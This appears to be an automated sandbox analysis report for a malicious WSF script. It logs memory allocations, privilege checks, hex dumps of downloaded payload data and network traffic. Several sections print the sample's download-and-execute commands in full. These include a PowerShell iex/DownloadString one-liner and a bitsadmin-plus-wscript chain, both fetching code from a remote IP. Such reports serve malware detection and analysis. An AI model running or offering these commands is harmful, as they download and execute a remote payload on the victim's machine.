NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 7, 2023, 9:23 a.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	powershell iex('(&(GCM W-O)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')\|iex
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&(GCM W-O)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')\|iex
cmdline	powershell bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 7, 2023, 9:23 a.m.	show_type: 0 filepath_r: powershell parameters: bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB'; filepath: powershell	1	1	0
ShellExecuteExW June 7, 2023, 9:23 a.m.	show_type: 0 filepath_r: powershell parameters: iex('(&(GCM W-O)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')\|iex filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 7, 2023, 9:23 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received

10720EFECE0E95A200674CB156138490000003832FDFFFF1107207F195BE35A20BC7E5BE961383100000038A2FBFFFF110011099A14178D010000012516028C0A000001A26F0700000A740200001B13013826FCFFFF0020A3CBDA6A13082002000000384CFBFFFF208181DA6E25261107205240D85E5A6138DFFFFFFF380BFDFFFF202347F6082526110720F7BFC6C35A6138C5FFFFFF383DFFFFFF20D0969C852526110720EF9DF03D5A6138ABFFFFFF3835FBFFFF1B300C00101600000B00001138F2150000FE0C14004502000000B1130000B314000038AC130000000020913AE7C4132B3834080000FE0C0C004513000000C60E00003C0C000083020000E2010000FE010000EE0400006F030000D4030000D40600005A06000059070000D4000000560B0000080E000073020000A6070000110100009B040000420D000038C10E00000311051F325818582841000006130620000000007E790000047B5B0000043987FFFFFF262000000000387CFFFFFF110416FE01131238E00E00007E0800000411037B110000041106110A20003000001F406F2D000006130D38D400000011163A3204000020010000007E790000047B520000043A32FFFFFF2620010000003827FFFFFF112A207DD4A0185A208AC837DA613809FFFFFF38A902000011173AD40F0000388E05000000208CCA237A38EDFEFFFF3836010000112A20E0A710AE5A200C38686A6138D5FEFFFF38CC0900002016CEA5E02538F00F000038E50F00000311051F54582849000006130B38FA04000011253A7A0E0000384509000020316953143898FEFFFF383A0B0000112A200E383DBA5A20CF00BB7F613880FEFFFF38FF090000111B110FFE041322388F050000112A2090883C725A200409C28561385BFEFFFF3859020000112A208F36CB545A20E8F24D95613843FEFFFF38F108000011223A720E00003841020000111B1758131B200A000000382DFEFFFF111539400F0000200B000000381CFEFFFF20DB36580E2538610E000038560E0000112A205BCAB5485A201B63EC176138EEFDFFFF38440A0000112C132438EA0C0000731900000A7A112A208A04D5915A20A86D0FAF6138C7FDFFFF38C00B0000201423CF6F25387A0E0000386F0E000011071F29941308385A00000020A08AE8672538C20D000038B70D00007E0900000411037B11000004110D03110B12016F3100000616FE01131A38D709000000200CD61BA43869FDFFFF38FB070000112A20850A83235A206A0EC09E613851FDFFFF385B0B000020D0518C8C3842FDFFFF388FFEFFFF112D39D90D00003822090000205A9D5CD72538B90E000038AE0E000020C6598AC13817FDFFFF38E5090000112A208041A8B55A20D41D7D4F6138FFFCFFFF38D6040000112A20E29523705A20008FD8606138E7FCFFFF38220B000000112A207AE4D0FC5A20950AF6B26138CEFCFFFF38ADFDFFFFD00E00000228450000067250020070281300000A14188D01000001251603A22517110E1F10588C0A000001A26F0700000AA50A000001131D388D0800007E0C00000402727E0200707E1A00000A7E1A00000A1620040000087E1A00000A14120212036F3D000006130438640300007E0B00000411037B1100000411096F3900000616FE0313182009000000FE0E0C00383CFCFFFF206E95211C25386F0D000038640D00000020777689B1381AFCFFFF38E4060000112A20BE6CFDBC5A202E1145A2613802FCFFFF386C0B000011263AE70C0000384800000020B16144612538270C0000381C0C0000110E1F2858130E200200000038DBFBFFFF112A204C28A8FA5A207E4E464C6138BDFBFFFF388C0900002023DA403638AEFBFFFF38EF050000202FB4BAC62538950C0000388A0C00000020B05C7C6E388EFBFFFF38460100007E0600000411037B1200000411076F2500000616FE01131520030000007E790000047B900000043968FBFFFF262010000000385DFBFFFF0311051F50582849000006130A20010000007E790000047B700000043A3CFBFFFF2620050000003831FBFFFF7E0400000411037B1200000411076F1D00000616FE011327387E05000020310FA34C2538770C0000386C0C00007E0A00000411037B1100000411081E5812091A12016F3500000616FE011316382D020000110D2842000006131038B909000011193A4D0C0000200E00000038C1FAFFFF206FF9973038ACFAFFFF3894050000112A20D32048645A20F209A1AA613894FAFFFF38AFFCFFFF281B00000A1AFE01131338C7090000D00E000002280200000A7250020070281300000A14188D01000001251603A22517110E1F0C588C0A000001A26F0700000AA50A000001131C384E000000D020000001280200000A7280020070281300000A141B8D01000001251603A22517111E8C0A00000

Data received

4FFFF2075FD7EDD2526112A2003FFE1B55A6138B0EFFFFF382BF5FFFF20F97684352526112A20D734DDEF5A613896EFFFFF3846FCFFFF2015CAEA4C2526112A209D77C1B95A61387CEFFFFF384AFBFFFF209366444A2526112A2016C0DE225A613862EFFFFF38DDFCFFFF2008794A792526112A205558D62C5A613848EFFFFF38B5FBFFFF20D4F11F2C2526112A200DF4BE555A61382EEFFFFF38BDFAFFFF207D7EBABF2526112A20C25FEE6B5A613814EFFFFF38AAEFFFFF205B2E6D512526112A20BDA39C975A6138FAEEFFFF3872F5FFFF20270C04C52526112A2047A01BAC5A6138E0EEFFFF384CF4FFFF20888DB37D2526112A206BEBD31E5A6138C6EEFFFF38F8F1FFFF20BB82D8E72526112A200ECA67745A6138ACEEFFFF386AF9FFFF2066097AD72526112A207B88DBFC5A613892EEFFFF384BEFFFFF20B45FCDD42526112A206418B7555A613878EEFFFF38ADFDFFFF20306C59222526112A206806F90F5A61385EEEFFFF3800000000DD1703000026381D010000112B66662048B51C5B652011EF58D9205B196E1C59209A0462612059DD5E24615920F9D49FE05A652083F09BE920E39321815A20312F55FC5A205F54168F5A202CA7F68B6620CD18940A20F1E6879E5A58656161616120FF60D4F1205B9C59566620F5FE73AF595A207C90A9BF6658665920FFFDCC175A656520D6F1CDF8208DC4F01259612055BDB4725A25132A1B5E450500000020000000050000005B0000007400000080000000384C00000011037B13000004281C00000A281D00000A6F1E00000A381900000000112A20B916E80A5A20105A2EC061384500000038CCFFFFFF112A20580B57485A2065677CF061382D000000380A000000382A00000038C5FFFFFF00112A2071F5E0475A208E2981B961380A000000380C000000209F2078A7132B38D7FEFFFFDD0500000038DE01000011001758130020000000007E790000047B3C0000043AE8ECFFFF26200000000038DDECFFFF112A202AD591BE5A2046CEE2E26138BE020000389200000000203FA0CB0438AE020000386600000016130138D0FFFFFF112A208DCCDFF45A20AC8FE57C61388E02000038D0FFFFFF38650000003889FFFFFF11001BFE041329384C010000387801000020010000007E790000047B4D0000043966ECFFFF262001000000385BECFFFF11293A8FFFFFFF38F70000001202FE1511000002382801000020CAFD2EC1383802000038A8FFFFFF16130038BB0000002A112B66662048B51C5B652011EF58D9205B196E1C59209A0462612059DD5E24615920F9D49FE05A652083F09BE920E39321815A20312F55FC5A205F54168F5A202CA7F68B6620CD18940A20F1E6879E5A58656161616120FF60D4F1205B9C59566620F5FE73AF595A207C90A9BF6658665920FFFDCC175A656520D6F1CDF8208DC4F01259612055BDB4725A25132A1E5E450800000026FFFFFF3500000059010000C0FEFFFF42FFFFFF73000000B0FEFFFF6401000038F1FEFFFF112A20857B93675A20BE07F2286138510100003856000000112A20DE2C43345A20F7DD85F76138450100003815FFFFFF1203FE15100000023851000000204E75E619382901000038C9FEFFFF38F4FEFFFF3815010000112A2064DEEF195A202DB67DFB6138FB000000384DFEFFFF1202D011000002280200000A281F00000A282000000A7D1500000438F4EAFFFF112A2015735C805A20AC21497C6138C300000038AE000000112B66662048B51C5B652011EF58D9205B196E1C59209A0462612059DD5E24615920F9D49FE05A652083F09BE920E39321815A20312F55FC5A205F54168F5A202CA7F68B6620CD18940A20F1E6879E5A58656161616120FF60D4F1205B9C59566620F5FE73AF595A207C90A9BF6658665920FFFDCC175A656520D6F1CDF8208DC4F01259612055BDB4725A25132A1B5E4505000000C6FDFFFF1FFDFFFF96FDFFFF1C000000F6FDFFFF3887FDFFFF388CFDFFFF3865FDFFFF0020F487C709132B38DBFDFFFF20AD379D1B132B382FFFF

Poweshell is sending data to a remote host (1 event)

Data sent

GET /r.png HTTP/1.1 Host: 141.98.6.105:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 7, 2023, 9:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 7, 2023, 9:23 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

141.98.6.105

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send June 7, 2023, 9:23 a.m.	buffer: GET /r.png HTTP/1.1 Host: 141.98.6.105:222 Connection: Keep-Alive socket: 1416 sent: 71	1	71	0

One or more non-whitelisted processes were created (6 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';
parent_process	wscript.exe	martian_process	powershell bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';
parent_process	wscript.exe	martian_process	powershell iex('(&(GCM W-O)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')\|iex
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&(GCM W-O)Net.WebClient).DownloadString(''http://141.98.6.105:222/r.png'')')\|iex
parent_process	powershell.exe	martian_process	"C:\Windows\system32\bitsadmin.exe" /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB
parent_process	powershell.exe	martian_process	"C:\Windows\system32\wscript.exe" //E:VBScript C:\Users\Public\VB

Uses suspicious command line tools or Windows utilities (3 events)

cmdline	"C:\Windows\system32\bitsadmin.exe" /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';
cmdline	powershell bitsadmin /transfer 8 http://141.98.6.105:222/m.txt C:\Users\Public\VB;wscript //E:VBScript 'C:\Users\Public\VB';

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\bitsadmin.exe
file	C:\Windows\SysWOW64\wscript.exe

INSYy.wsf

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All